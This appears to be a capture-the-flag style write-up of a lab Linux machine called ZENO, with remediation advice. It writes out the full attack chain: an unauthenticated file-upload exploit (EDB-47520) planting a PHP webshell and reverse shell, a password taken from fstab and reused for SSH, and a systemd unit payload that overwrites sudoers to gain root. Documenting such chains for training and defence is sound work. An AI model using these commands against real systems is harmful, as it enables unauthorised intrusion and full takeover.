Restaurant CMS upload RCE and writable systemd reboot to root
Intermediate Linux engagement: Sourcecodester Restaurant Management System on a nonstandard HTTP port accepted an unauthenticated upload (EDB-47520); fstab credentials unlocked SSH as edward; a world-writable systemd unit plus sudo reboot rewrote sudoers for root.
- Case files
- Restaurant CMS upload RCE and writable systemd reboot to root
Apache on port 12340 hosted RMS. Unauth file upload yielded an apache shell; CIFS credentials in fstab reused for edward; writable zeno-monitoring.service plus NOPASSWD reboot completed root.
gobuster found /rms/. EDB-47520 deployed reverse-shell.php; a reverse shell landed as apache.
Commented CIFS credentials in /etc/fstab authenticated SSH as edward.
Overwrote zeno-monitoring.service ExecStart to plant sudoers, then rebooted with NOPASSWD reboot.
Engagement summary
Apache on port 12340 hosted RMS. Unauth file upload yielded an apache shell; CIFS credentials in fstab reused for edward; writable zeno-monitoring.service plus NOPASSWD reboot completed root.
Against ZENO (10.10.229.206), full-port scanning found OpenSSH and HTTP on 12340 serving Restaurant Management System under /rms/. Exploit-DB 47520 uploaded a PHP webshell via admin/foods-exec.php into images/, giving command execution as apache. /etc/fstab contained a commented CIFS mount with password FrobjoodAdkoonceanJa, reused for SSH as edward. sudo -l allowed /usr/sbin/reboot without a password, and /etc/systemd/system/zeno-monitoring.service was world-writable. We rewrote ExecStart to plant a sudoers rule, rebooted, and returned as edward with unrestricted sudo.
Business impact
Unauthenticated CMS uploads are remote code execution. Secrets left in fstab comments become SSH keys in practice. World-writable systemd units combined with reboot privileges are a root backdoor. Remove legacy RMS, scrub mount credentials from world-readable files, and lock unit file permissions to root:root 644.
Nonstandard HTTP and RMS upload RCE
gobuster found /rms/. EDB-47520 deployed reverse-shell.php; a reverse shell landed as apache.
OPERATOR · NMAP
savvy@lab:~$ nmap -sSCV -p- 10.10.229.206
22/tcp open ssh OpenSSH
12340/tcp open http Apache httpd
savvy@lab:~$ gobuster dir -u http://10.10.229.206:12340/ -w directory-list-2.3-medium.txt
/rms (Status: 301)
OPERATOR · EDB-47520
savvy@lab:~$ python3 47520.py http://10.10.229.206:12340/rms/
savvy@lab:~$ curl 'http://10.10.229.206:12340/rms/images/reverse-shell.php?cmd=id'
uid=48(apache) gid=48(apache)
savvy@lab:~$ nc -nvlp 4444
# trigger bash reverse shell via webshell cmd parameter
savvy@lab:/$ id
fstab credential reuse to edward
Commented CIFS credentials in /etc/fstab authenticated SSH as edward.
OPERATOR · FSTAB
savvy@lab:~$ cat /etc/fstab
# username=zeno password=FrobjoodAdkoonceanJa
savvy@lab:~$ ssh edward@10.10.229.206
savvy@lab:~$
Writable systemd unit and sudo reboot
Overwrote zeno-monitoring.service ExecStart to plant sudoers, then rebooted with NOPASSWD reboot.
PAYLOAD
zeno-monitoring.service
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/sh -c 'echo "edward ALL=(root) NOPASSWD: ALL" > /etc/sudoers'
[Install]
WantedBy=multi-user.targetOPERATOR · ROOT
savvy@lab:~$ sudo -l
(ALL) NOPASSWD: /usr/sbin/reboot
savvy@lab:~$ ls -la /etc/systemd/system/zeno-monitoring.service
-rw-rw-rw- 1 root root ... zeno-monitoring.service
savvy@lab:~$ sudo /usr/sbin/reboot
savvy@lab:~$ ssh edward@10.10.229.206
savvy@lab:~$ sudo su
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Patch or remove Restaurant Management System; block unauthenticated uploads. Never store share passwords in world-readable fstab comments. Unit files must be root-owned 644; do not grant reboot without also protecting unit contents.